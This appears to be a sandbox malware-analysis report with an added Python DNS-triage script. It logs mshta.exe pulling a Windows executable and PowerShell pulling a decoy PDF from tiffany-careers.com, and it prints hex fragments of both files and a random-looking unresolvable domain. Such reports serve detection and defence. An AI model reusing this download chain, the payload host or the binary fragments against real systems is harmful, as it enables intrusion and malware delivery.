                                                                        Dec 27, 2024 09:05:40.803638935 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.815781116 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.815817118 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.815875053 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.815891981 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.815923929 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.815947056 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.827326059 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.827354908 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.827414989 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.827428102 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.827461958 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.827491999 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.909162045 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.909188032 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.909262896 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.909293890 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.909308910 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.909358978 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.954746962 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.954776049 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.954833984 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.954869032 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.954886913 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.955048084 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.963752031 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.963768959 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.963838100 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.963855982 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.963896036 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.963920116 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.971554995 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.971571922 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.971633911 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.971645117 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.971681118 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.980511904 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.980530024 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.980602026 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.980611086 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.980654001 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.989001989 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.989022017 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.990056992 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.990065098 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.990155935 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.997947931 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.997967005 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.998058081 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:40.998065948 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:40.998116016 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.054964066 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.054989100 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.055052042 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.055067062 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.055094004 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.055118084 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.139619112 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.139657974 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.139718056 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.139753103 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.139767885 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.139796019 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.144833088 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.144867897 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.144907951 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.144915104 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.144968987 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.151391029 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.151417017 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.151464939 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.151472092 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.151527882 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.158122063 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.158148050 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.158204079 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.158210993 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.158261061 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.163937092 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.163964033 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.164056063 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.164062023 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.164127111 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.171169996 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.171195030 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.171248913 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.171255112 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.171299934 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.177453995 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.177475929 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.177535057 CET49729443192.168.2.8147.45.49.155
                                                                        Dec 27, 2024 09:05:41.177542925 CET44349729147.45.49.155192.168.2.8
                                                                        Dec 27, 2024 09:05:41.177594900 CET49729443192.168.2.8147.45.49.155
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 09:05:15.194235086 CET | 62818 | 53 | 192.168.2.8 | 1.1.1.1
Dec 27, 2024 09:05:15.512497902 CET | 53 | 62818 | 1.1.1.1 | 192.168.2.8
Dec 27, 2024 09:05:35.292830944 CET | 49579 | 53 | 192.168.2.8 | 1.1.1.1
Dec 27, 2024 09:05:45.570933104 CET | 61974 | 53 | 192.168.2.8 | 1.1.1.1
Dec 27, 2024 09:05:45.792874098 CET | 53 | 61974 | 1.1.1.1 | 192.168.2.8
Dec 27, 2024 09:06:04.424026966 CET | 61277 | 53 | 192.168.2.8 | 1.1.1.1
Dec 27, 2024 09:06:04.562596083 CET | 53 | 61277 | 1.1.1.1 | 192.168.2.8
Dec 27, 2024 09:06:04.954224110 CET | 60288 | 53 | 192.168.2.8 | 1.1.1.1
Dec 27, 2024 09:06:05.093890905 CET | 53 | 60288 | 1.1.1.1 | 192.168.2.8
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                                                       Type            Class        DNS over HTTPS
Dec 27, 2024 09:05:15.194235086 CET  192.168.2.8  1.1.1.1  0xfee3    Standard query (0)  tiffany-careers.com                                        A (IP address)  IN (0x0001)  false
Dec 27, 2024 09:05:35.292830944 CET  192.168.2.8  1.1.1.1  0x378e    Standard query (0)  x1.i.lencr.org                                             A (IP address)  IN (0x0001)  false
Dec 27, 2024 09:05:45.570933104 CET  192.168.2.8  1.1.1.1  0xa3f3    Standard query (0)  nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs  A (IP address)  IN (0x0001)  false
Dec 27, 2024 09:06:04.424026966 CET  192.168.2.8  1.1.1.1  0xfbc0    Standard query (0)  nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs  A (IP address)  IN (0x0001)  false
Dec 27, 2024 09:06:04.954224110 CET  192.168.2.8  1.1.1.1  0x8d95    Standard query (0)  nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                                                       CName                                    Address          Type                    Class        DNS over HTTPS
Dec 27, 2024 09:05:15.512497902 CET  1.1.1.1    192.168.2.8  0xfee3    No error (0)    tiffany-careers.com                                        -                                        147.45.49.155    A (IP address)          IN (0x0001)  false
Dec 27, 2024 09:05:28.714724064 CET  1.1.1.1    192.168.2.8  0xbc      No error (0)    bg.microsoft.map.fastly.net                                -                                        199.232.214.172  A (IP address)          IN (0x0001)  false
Dec 27, 2024 09:05:28.714724064 CET  1.1.1.1    192.168.2.8  0xbc      No error (0)    bg.microsoft.map.fastly.net                                -                                        199.232.210.172  A (IP address)          IN (0x0001)  false
Dec 27, 2024 09:05:35.586566925 CET  1.1.1.1    192.168.2.8  0x378e    No error (0)    x1.i.lencr.org                                             crl.root-x1.letsencrypt.org.edgekey.net  -                CNAME (Canonical name)  IN (0x0001)  false
Dec 27, 2024 09:05:45.792874098 CET  1.1.1.1    192.168.2.8  0xa3f3    Name error (3)  nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs  none                                     none             A (IP address)          IN (0x0001)  false
Dec 27, 2024 09:06:04.562596083 CET  1.1.1.1    192.168.2.8  0xfbc0    Name error (3)  nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs  none                                     none             A (IP address)          IN (0x0001)  false
Dec 27, 2024 09:06:05.093890905 CET  1.1.1.1    192.168.2.8  0x8d95    Name error (3)  nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs  none                                     none             A (IP address)          IN (0x0001)  false
Dec 27, 2024 09:06:36.325066090 CET  1.1.1.1    192.168.2.8  0xcba8    No error (0)    bg.microsoft.map.fastly.net                                -                                        199.232.210.172  A (IP address)          IN (0x0001)  false
Dec 27, 2024 09:06:36.325066090 CET  1.1.1.1    192.168.2.8  0xcba8    No error (0)    bg.microsoft.map.fastly.net                                -                                        199.232.214.172  A (IP address)          IN (0x0001)  false
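Two things in the DNS tables above are worth pulling out mechanically: the single resolution of tiffany-careers.com to 147.45.49.155, which is the destination of every TCP session in the report, and the name nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs, which has no public TLD, is queried three times and is answered NXDOMAIN each time. The Python below is an added triage example, not part of the Joe Sandbox report: it groups the query and reply rows by name and flags NXDOMAIN answers, repeated unresolvable names, names whose last label is not a public TLD, mixed-case or high-entropy labels, and names whose answer matches a contacted IP. The rows are transcribed from the tables above; the TLD subset and the entropy threshold are assumptions chosen for illustration.

```python
from __future__ import annotations

import math
from collections import defaultdict

# Transcribed from the DNS query and reply tables of this report (transaction IDs,
# names, reply codes and answers as shown there). Hand-copied: illustrative input.
QUERIES = [
    (0xfee3, "tiffany-careers.com"),
    (0x378e, "x1.i.lencr.org"),
    (0xa3f3, "nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs"),
    (0xfbc0, "nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs"),
    (0x8d95, "nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs"),
]
# (transaction id, rcode, name, record type, answer); answer is None for NXDOMAIN (3)
REPLIES = [
    (0xfee3, 0, "tiffany-careers.com", "A", "147.45.49.155"),
    (0x378e, 0, "x1.i.lencr.org", "CNAME", "crl.root-x1.letsencrypt.org.edgekey.net"),
    (0xa3f3, 3, "nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs", "A", None),
    (0xfbc0, 3, "nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs", "A", None),
    (0x8d95, 3, "nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs", "A", None),
]
# Destination of the TCP/HTTP sessions in this report.
CONTACTED_IPS = {"147.45.49.155"}

# Assumed, illustrative subset of public TLDs; a real tool loads the IANA root zone
# list or the Public Suffix List instead.
PUBLIC_TLDS = {"com", "net", "org", "io", "info", "biz", "ru", "de", "uk", "xyz", "top"}
ENTROPY_THRESHOLD = 3.8  # bits per character; assumed cut-off for "looks generated"


def label_entropy(label: str) -> float:
    """Shannon entropy of one DNS label in bits per character (case-sensitive)."""
    if not label:
        return 0.0
    n = len(label)
    return -sum(label.count(c) / n * math.log2(label.count(c) / n) for c in set(label))


def triage(queries, replies, contacted_ips) -> dict[str, dict]:
    """Group queries and replies by name and attach triage flags to each name."""
    by_name: dict[str, dict] = defaultdict(
        lambda: {"queries": 0, "rcodes": set(), "answers": [], "flags": []}
    )
    for _tid, name in queries:
        by_name[name]["queries"] += 1
    for _tid, rcode, name, _rtype, answer in replies:
        by_name[name]["rcodes"].add(rcode)
        if answer is not None:
            by_name[name]["answers"].append(answer)

    for name, entry in by_name.items():
        labels = name.split(".")
        flags = entry["flags"]
        if 3 in entry["rcodes"]:
            flags.append("nxdomain")
        if entry["queries"] > 1 and not entry["answers"]:
            flags.append("repeated-unresolvable")
        if labels[-1].lower() not in PUBLIC_TLDS:
            flags.append("no-public-tld")
        # Stub resolvers send names as typed; a label mixing cases is unusual for a
        # hostname a human or a normal library produced.
        if any(lab != lab.lower() and lab != lab.upper() for lab in labels):
            flags.append("mixed-case-label")
        if max(label_entropy(lab) for lab in labels) > ENTROPY_THRESHOLD:
            flags.append("high-entropy-label")
        if any(a in contacted_ips for a in entry["answers"]):
            flags.append("resolved-ip-contacted")
    return dict(by_name)


if __name__ == "__main__":
    for name, entry in triage(QUERIES, REPLIES, CONTACTED_IPS).items():
        print(f"{name}: {entry['queries']} queries, rcodes={sorted(entry['rcodes'])}, "
              f"flags={entry['flags'] or ['none']}")
```

On this report's rows the function leaves x1.i.lencr.org (a Let's Encrypt CRL lookup) unflagged, marks tiffany-careers.com only as the name behind the contacted IP, and attaches all five negative flags to the nbhkm... name.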
                                                                        • tiffany-careers.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.8  49705        147.45.49.155   443               8084  C:\Windows\System32\mshta.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-27 08:05:17 UTC  333                OUT        GET /ghep2412_2 HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-CH
                                                                        UA-CPU: AMD64
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                        Host: tiffany-careers.com
                                                                        Connection: Keep-Alive
2024-12-27 08:05:17 UTC  397                IN         HTTP/1.1 200 OK
                                                                        etag: "6bc77-676a8e87-23c55;;;"
                                                                        last-modified: Tue, 24 Dec 2024 10:35:51 GMT
                                                                        content-length: 441463
                                                                        accept-ranges: bytes
                                                                        date: Fri, 27 Dec 2024 08:05:17 GMT
                                                                        server: LiteSpeed
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        connection: close
2024-12-27 08:05:17 UTC  16384              IN         Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 1b 8a 28 f3 7a e4 7b f3 7a e4 7b f3 7a e4 7b e7 11 e7 7a f0 7a e4 7b e7 11 e0 7a e4 7a e4 7b e7 11 e1 7a f4 7a e4 7b e7 11 e5 7a ee 7a e4 7b f3 7a e5 7b da 7b e4 7b e7 11 ed 7a e0 7a e4 7b e7 11 1b 7b f2 7a e4 7b e7 11 e6 7a f2 7a e4 7b 52 69 63 68 f3 7a e4 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b4 fd 18 da 00 00 00
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(z{z{z{zz{zz{zz{zz{z{{{zz{{z{zz{Richz{PEL
2024-12-27 08:05:18 UTC  16384              IN         Data Raw: 33 d2 89 10 89 13 89 17 85 f6 0f 84 89 00 00 00 8d 41 02 89 45 fc 66 8b 01 83 c1 02 66 3b c2 75 f5 2b 4d fc d1 f9 74 71 83 f9 03 77 6c 6a 30 58 89 45 fc 85 c9 74 16 66 8b 04 56 66 2b 45 fc 66 83 f8 09 77 54 42 3b d1 72 ed 6a 30 58 83 f9 03 75 1d 8b 4d f8 0f b7 06 6a 30 5a 2b c2 89 01 0f b7 46 02 2b c2 89 03 0f b7 46 04 2b c2 eb 15 83 f9 02 75 14 0f b7 06 6a 30 59 2b c1 89 03 0f b7 46 02 2b c1 89 07 eb 0c 83 f9 01 75 07 0f b7 0e 2b c8 89 0f 33 c0 40 eb 02 33 c0 5f 5e 5b c9 c2 08 00 8b ff 55 8b ec 83 ec 14 53 56 57 85 c9 74 5c 83 65 fc 00 83 65 f4 00 6a 03 58 66 89 45 ec 8d 45 fc 50 68 e0 14 40 00 6a fc 51 ff 15 10 13 41 00 85 c0 75 37 8b 45 fc 85 c0 74 30 8b 18 8d 75 ec 83 ec 10 8b fc 8b 4b 54 6a 01 a5 50 a5 a5 a5 ff 15 4c 14 41 00 ff 53 54 8b 45 fc 50 8b
                                                                        Data Ascii: 3AEff;u+Mtqwlj0XEtfVf+EfwTB;rj0XuMj0Z+F+F+uj0Y+F+u+3@3_^[USVWt\eejXfEEPh@jQAu7Et0uKTjPLASTEP
2024-12-27 08:05:18 UTC  16384              IN         Data Raw: 5e eb 0b ff 72 f4 8b cb 52 e8 53 02 00 00 5f 8b c3 5b 5d c2 04 00 6a 08 b8 10 ed 40 00 e8 52 5b 00 00 8b f1 89 75 f0 68 78 02 41 00 e8 6f ba ff ff ff 75 08 83 65 fc 00 8b ce e8 1c 00 00 00 84 c0 75 0a ff 75 08 8b ce e8 57 ff ff ff 83 4d fc ff 8b c6 e8 ea 5a 00 00 c2 04 00 8b ff 55 8b ec 51 8b 45 08 32 d2 85 c0 74 12 a9 00 00 ff ff 75 0b 0f b7 c0 50 e8 52 c7 ff ff b2 01 8a c2 59 5d c2 04 00 6a 04 b8 44 ed 40 00 e8 e5 5a 00 00 8b d1 83 65 f0 00 8b 7d 0c 85 ff 79 02 33 ff 8b 75 10 85 f6 79 02 33 f6 b8 ff ff ff 7f 2b c7 3b c6 7c 67 8b 1a 8d 04 37 8b 4b f4 3b c1 7e 04 8b f1 2b f7 3b f9 7e 02 33 f6 85 ff 75 28 3b f1 75 24 8d 4b f0 e8 38 c8 ff ff 8b 4d 08 83 c0 10 89 01 21 7d fc c7 45 f0 01 00 00 00 8b c1 e8 51 5a 00 00 c2 0c 00 8b ca e8 bb c7 ff ff 8b 4d 08 50
                                                                        Data Ascii: ^rRS_[]j@R[uhxAoueuuWMZUQE2tuPRY]jD@Ze}y3uy3+;|g7K;~+;~3u(;u$K8M!}EQZMP
2024-12-27 08:05:18 UTC  16384              IN         Data Raw: fc 8d 41 28 57 8b 7d fc 89 45 fc 3b f8 74 3b 53 56 8b 1f 85 db 74 24 8b f3 8b 5b 04 8d 4e 08 e8 c0 e8 ff ff 56 6a 00 ff 15 f4 11 41 00 50 ff 15 dc 12 41 00 85 db 75 df 8b 45 fc c7 07 00 00 00 00 83 c7 04 3b f8 75 c9 5e 5b 5f c9 c3 8b ff 55 8b ec 56 57 8b 39 33 f6 56 6a ff 57 ff 15 30 12 41 00 b9 80 00 00 00 3d 02 01 00 00 74 08 85 c0 74 0c 3b c1 75 15 85 c0 74 04 3b c1 75 02 8b f7 8b 45 08 5f 89 30 5e 5d c2 10 00 51 8b 4d 04 e8 1e e4 ff ff cc 8b ff 55 8b ec 51 53 56 8b f1 8b da 33 c9 57 3b f3 74 45 8b 7d 08 85 ff 74 3e 66 39 0f 74 39 8b cf e8 47 df ff ff 2b de 89 45 fc 3b d8 73 0c 8b 45 0c 85 c0 74 2b 83 20 00 eb 26 50 57 53 56 ff 15 1c 14 41 00 8b 45 0c 83 c4 10 85 c0 74 02 89 30 8b 45 fc 03 c6 eb 0b 8b 45 0c 85 c0 74 02 89 08 8b c6 5f 5e 5b c9 c2 08 00
                                                                        Data Ascii: A(W}E;t;SVt$[NVjAPAuE;u^[_UVW93VjW0A=tt;ut;uE_0^]QMUQSV3W;tE}t>f9t9G+E;sEt+ &PWSVAEt0EEt_^[
2024-12-27 08:05:18 UTC  16384              IN         Data Raw: ac 31 01 00 7c 31 01 00 42 31 01 00 16 31 01 00 ec 30 01 00 c0 30 01 00 8e 30 01 00 60 30 01 00 30 30 01 00 fe 2f 01 00 c0 2f 01 00 8e 2f 01 00 6c 2f 01 00 0e 2f 01 00 da 2e 01 00 b6 2e 01 00 90 2e 01 00 48 2e 01 00 f8 2d 01 00 a8 2d 01 00 5a 2d 01 00 26 2d 01 00 f0 2c 01 00 b0 2c 01 00 6a 2c 01 00 40 2c 01 00 1a 2c 01 00 ec 2b 01 00 c0 2b 01 00 78 2b 01 00 48 2b 01 00 20 2b 01 00 e6 2a 01 00 aa 2a 01 00 72 2a 01 00 2c 2a 01 00 fa 29 01 00 a6 29 01 00 7a 29 01 00 4c 29 01 00 1e 29 01 00 f4 28 01 00 b2 28 01 00 56 28 01 00 20 28 01 00 ca 27 01 00 7a 27 01 00 3c 27 01 00 06 27 01 00 d0 26 01 00 7e 26 01 00 4c 26 01 00 22 26 01 00 ee 25 01 00 a8 25 01 00 6a 25 01 00 32 25 01 00 e4 24 01 00 a8 24 01 00 74 24 01 00 3e 24 01 00 08 24 01 00 cc 23 01 00 8e 23 01
                                                                        Data Ascii: 1|1B11000`000///l//...H.--Z-&-,,j,@,,++x+H+ +**r*,*))z)L))((V( ('z'<''&~&L&"&%%j%2%$$t$>$$##


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.8  49709        147.45.49.155   443               7508  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-27 08:05:22 UTC  92                 OUT        GET /Project_Information.pdf HTTP/1.1
                                                                        Host: tiffany-careers.com
                                                                        Connection: Keep-Alive
2024-12-27 08:05:23 UTC  428                IN         HTTP/1.1 200 OK
                                                                        etag: "5d662-676a8e3a-23c54;;;"
                                                                        last-modified: Tue, 24 Dec 2024 10:34:34 GMT
                                                                        content-type: application/pdf
                                                                        content-length: 382562
                                                                        accept-ranges: bytes
                                                                        date: Fri, 27 Dec 2024 08:05:22 GMT
                                                                        server: LiteSpeed
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        connection: close
2024-12-27 08:05:23 UTC  16384              IN         Data Raw: 25 50 44 46 2d 31 2e 35 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 2d 55 53 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 33 31 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 37 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 36 20 30 20 52 20 31 38 20 30 20 52 20 32 30 20 30 20 52 20 32 34 20 30 20 52 20 32 36 20 30 20 52 20 32 38 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20 32 20 30 20
                                                                        Data Ascii: %PDF-1.5%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 31 0 R/MarkInfo<</Marked true>>>>endobj2 0 obj<</Type/Pages/Count 7/Kids[ 3 0 R 6 0 R 18 0 R 20 0 R 24 0 R 26 0 R 28 0 R] >>endobj3 0 obj<</Type/Page/Parent 2 0
2024-12-27 08:05:23 UTC  16384              IN         Data Raw: 09 bc ff 00 ae 12 7f e8 26 be d8 f3 0f 96 7c 41 ff 00 21 ab 8f ad 65 d6 a7 88 3f e4 35 71 f5 ac ba 62 3d 03 e1 3f fc 8d 10 7f bf fd 0d 7d 0b 5f 3d 7c 27 ff 00 91 a2 0f f7 ff 00 a1 af a1 68 00 a2 8a 29 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 2a 95 e3 66 40 be 82 ae d6 7d d7 fa f3 40 10 d1 45 14 c0 28 a2 8a 00 28 a2 8a 00 bf 6a db a1 00 f6 a8 ef 24 e0 20 3f 5a 5b 2f b8
                                                                        Data Ascii: &|A!e?5qb=?}_=|'h)((((((((((((((((((((((((((((((((((((*f@}@E((j$ ?Z[/
